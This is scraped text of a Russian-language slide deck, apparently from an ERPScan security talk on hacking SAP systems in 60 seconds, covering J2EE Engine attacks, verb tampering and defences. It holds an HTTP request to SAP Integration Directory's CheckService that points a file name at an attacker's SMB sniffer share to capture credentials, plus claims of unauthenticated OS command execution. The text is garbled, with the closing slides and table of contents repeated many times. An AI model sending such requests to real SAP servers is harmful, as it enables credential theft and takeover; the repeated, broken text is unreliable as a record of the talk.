ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-